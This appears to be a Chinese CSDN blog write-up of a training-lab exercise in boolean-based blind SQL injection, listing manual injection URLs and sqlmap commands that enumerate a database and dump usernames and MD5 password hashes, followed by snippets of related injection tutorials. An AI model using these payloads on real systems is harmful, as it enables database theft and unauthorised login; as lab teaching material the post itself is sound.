SQL注入——GET数字布尔盲注

最新推荐文章于 2022-06-13 20:27:32 发布
最新推荐文章于 2022-06-13 20:27:32 发布
阅读量485 收藏 1
点赞数
文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44889655/article/details/109026715
版权

GET数字布尔盲注——墨者学院

手工注入

  • 判断注入点
http://219.153.49.228:44957/new_list.php?id=1 and 1=1
http://219.153.49.228:44957/new_list.php?id=1 and 1=2
  • MySQL版本
http://219.153.49.228:44957/new_list.php?id=1 and substring(version(),1,1)=1
  • 爆库
    库长——长度为10
http://219.153.49.228:44957/new_list.php?id=1 and length((database()) = 1

库字符——stormgroup

http://219.153.49.228:44957/new_list.php?id=1 and substring(database(),1,1) = 'a'

  • 表长——共2个表,长度都为6
http://219.153.49.228:44957/new_list.php?id=1 and length((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1 )) = 6

表字符——number,notice

http://219.153.49.228:44957/new_list.php?id=1 and substring((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1 ),1,1) = 'm'

在这里插入图片描述


  • 列长——共3个列,分别为4,8,6
http://219.153.49.228:44957/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1))=4

列字符——name,password,status

http://219.153.49.228:44957/new_list.php?id=1 and substring((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),1,1)='n'

在这里插入图片描述

  • 字段
    字段长——name为5,password为32
http://219.153.49.228:44957/new_list.php?id=1 and length((select concat(name) from stormgroup.member limit 1,1))=5 
http://219.153.49.228:44957/new_list.php?id=1 and length((select concat(password) from stormgroup.member limit 1,1))=32

字段字符——name = mozhe,password = 3114b433dece9180717f2b7de56b28a3(528469)或d0ac5d1ed5b095895e780c8081182111(482513)

http://219.153.49.228:44957/new_list.php?id=1 and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))=109
http://219.153.49.228:44957/new_list.php?id=1 and ascii(substr((select concat(password) from stormgroup.member limit 0,1),1,1))=51

在这里插入图片描述在这里插入图片描述

工具注入

  • 爆数据库名:sqlmap -u "http://219.153.49.228:41621/new_list.php?id=1" --dbs
  • 爆表:sqlmap -u "http://219.153.49.228:41621/new_list.php?id=1" -D stormgroup --tables
  • 爆字段:sqlmap -u "http://219.153.49.228:41621/new_list.php?id=1" -D stormgroup -T member --columns
  • 爆值:sqlmap -u "http://219.153.49.228:41621/new_list.php?id=1" -D stormgroup -T member -C "name,password" --dump
  • 直接尝试用dump的name和password登录,发现不行,最后才知道password经过MD5加密,在线解密后登录(第二个),即可在后台拿到key:
坠落星空
关注
复现awvs——sql注入漏洞(时间盲注
记录并分享学习安全的知识点..
01-14 1687
一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。 按变量类型分: • 数字型 • 字符型 按 HTTP 提交方式分 • GET 注入 • POST 注入 • Cookie 注入注入方式分 • 报错注入盲注布尔盲注 • 时间盲注 • union 注入 编码问题 • 宽字节注入 二、awvs扫描结果 三、漏洞复现——bp联合xray,手测加sqlmap爆破 xray开
复现awvs——sql注入漏洞(报错注入加时间盲注
记录并分享学习安全的知识点..
03-12 3401
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。 按变量类型分: • 数字型 • 字符型 按 HTTP 提交方式分 • GET 注入 • POST 注入 • Cookie 注入注入方式分 • 报错注入盲注布尔盲注 • 时间盲注 • union 注入 编码问题 • 宽字节注入 二、awvs扫描结果 .
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3687
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
GET注入-盲注
weixin_52620919的博客
11-17 534
盲注,意味着页面不会显示SQL语句的错误,我们要通过一定的手段来判断构造的注入语句是否正确执行。 有两种方式:布尔型和时间型。 布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行,时间型则是根据页面加载时间是否变化来判断的。 相关函数 盲注需要掌握一些MySQL的相关函数: length(str): 返回str字符串的长度。如执行select length(database()) 则会返回当前数据库名称的长度。 而单独selectdatabase()则回返回当前数据库的名称。 substr(
Get盲注
m0_69676459的博客
05-07 543
今日学习了盲注相关的函数: length(str):返回字符串的长度 sub(str,a,b):从a的位置取出字符串的b个字符。eg.sub('abcd',1,1)='a' ascii(str):取出字符串第一个字符的ascii码值。 if(exp1,exp2,exp3)是一个条件判断语句,exp1位需要判断的语句,exp2是语句为真时执行的语句,exp3是语句为假时执行的语句。 eg.if(select database()= 'username',sleep(15),null)意思为当数据库的
SQL数字型GET注入
Snowflake1997的博客
02-16 863
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为: http://[靶机IP]/sqli-labs/Less-2/ 登录后,根据网页提示,给定一个GET参数,即: http://[靶机IP]/sqli-labs/Less-2/?id=1 此时页面显示id=1的用户名Dump、密码Dump。 以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。 寻找
GET型盲注
山兔的博客
08-01 267
一、sql盲注sql注入过程中, sql语句执行的选择后,选择的数据不能回显到前端页面。 类型:基于布尔的SQL盲注、基于时间的SQL盲注、基于报错的SQL盲注。 Information_schema数据库基本表说明: schemata表:提供了当前mysql实例中所有的数据库信息 tables表:提供了关于数据库中的所有表的信息, columns表:提供表中所有列信息,即表明了表中所有列及每列的信息 任务描述: 注入流程: 1.根据提示加入id参数在url中,可以看到他不再像前面报错注入一样回显有效信
sql注入学习——布尔盲注
Lemon's blog
07-27 851
前言:之前通过前九关学习到了回显注入、报错注入等一些方法,这次就来详细的学习布尔盲注和时间盲注。 首先来了解一下盲注的概念 盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入布尔盲注 原理: 注入的时候只会返回True和False,所以布尔盲注就是根据页面显示的是True还是False进行猜测数据库中的信息。 ...
SQL注入——盲注和手工注入
bosskim的博客
06-13 1271
温故知新,学习sql注入分类
SQL盲注注入——布尔
Forever8023的博客
07-24 1416
盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔盲注。 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句...
sql_1-2_get基于盲注
weixin_44110913的博客
12-02 381
1
SQL注入-GET型-单参数-时间型盲注
qq_33505576的博客
09-24 304
1、概要 现在的CTF竞赛,WEB类型的题目,SQL注入可以说是必考题,而且,现在的SQL注入题目越来越难了,各种过滤,所以我们的SQL注入神器SQLMAP基本上可以说是没用了,必须要我们自己写脚本和payload进行手工注入,本篇文章以GET型-单参数-时间型盲注为例,总结一下这类题型的做题方法,不喜勿喷。 2、审题 拿到SQL注入的题目,首先要审题,并结合提示看是考察union select注入、报错注入盲注还是堆叠注入,难题一般都是考察盲注。判断存在什么类型的注入不难,属于基础内容,这里不进一步去展
基于GET的盲注
LuckySec
02-11 592
盲注介绍 先进行Boolean盲注,若实在不行再进行时间盲注 GET基于Boolean的盲注,实验:sqli-labs less -8 输入:?id=1' and length(database()) = 10 --+ 输出:无任何信息 由此证明:数据库数为10错误 输入:?id=1' and length(database()) = 8 --+ 输出:You are in..............
【Get】用深度学习识别手写数字
weixin_33895016的博客
10-19 179
image 前置参考读物: 《机器学习,看完就明白了》传送门 获取数据源 训练数据直接使用开源的手写数据集MNIST。 MNIST数据集是一个开源的手写数据库。它提供了大量的数据样本作为训练集和验证集。这个数据集拥有 60000 个训练样本,和 10000 个测试样本。 MNIST 官网(一个很 ...
安鸾靶场 sql注入--SQL数字型GET注入01
s666789s的博客
04-06 602
1.SQL数字型GET注入01 (1)输入1’报错,输入-1返回正常,构造payload (2)判断显示位 -1 order by 3# -1 union select 1,2,3# (3)爆库:-1 union select 1,database(),3# (4)爆表:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘dwvs’# (5)爆列:-1 union se
SQL数字型GET注入02
海宝最美的博客
12-03 720
SQL数字型GET注入02 靶机地址:http://whalwl.site:8034/ 【2020年8月前有效】 话不多说,打开网址,看到有个交互式的搜索框,直接干 输入1,没毛病 输入1’ ,报错 查看错误提示,多了一个单引号’,用#注释,没毛病 1' order by 14 # //查看字段数,即列数【用二分法一个个尝试,发现order by 15时报错,14刚...
布尔盲注
华丽的贵族
10-27 314
1.确定数据库长度: ’ and length(database()) >0# // 0一直换着试直到报错,然后换成=,报错的那个数字就是数据库长度 2.确定数据库名称: ’ and ascii(substr(database(),1,1))>100# // (1,1)第一个1换着成2就是查询数据库第二个字段(直到数据库长度的数字为止),100换着试直到报错,然后去对照ascii表看...
SQL注入知识点总结
千寻的博客
02-11 1619
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 注释第二节 mysql 元数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...
SQL-LABS GET型布尔盲注脚本(node)
AaronLuo
09-03 371
原理 基于SQL-LABS LESS-5,LESS-8 GET型布尔注入,(布尔盲注详解),,基于MSQL 布尔盲注,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值 由于0-z的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7 ,通过按位与运算8次,结果相加...
burpsuite sql注入漏洞测试(布尔盲注)
最新发布
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔盲注是一种常用的技术之一。布尔盲注是一种盲注攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔盲注漏洞: 1. 配置Burp ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值